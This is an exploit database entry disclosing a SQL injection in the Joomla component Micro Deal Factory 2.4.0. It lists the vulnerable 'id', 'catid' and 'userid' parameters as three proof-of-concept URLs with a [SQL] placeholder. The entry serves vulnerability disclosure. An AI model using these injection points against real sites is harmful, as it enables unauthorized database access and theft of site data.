Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection

EDB-ID:

45452

CVE:

N/A




Platform:

PHP

Date:

2018-09-24


# Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/
# Version: 2.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL]
http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other
http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01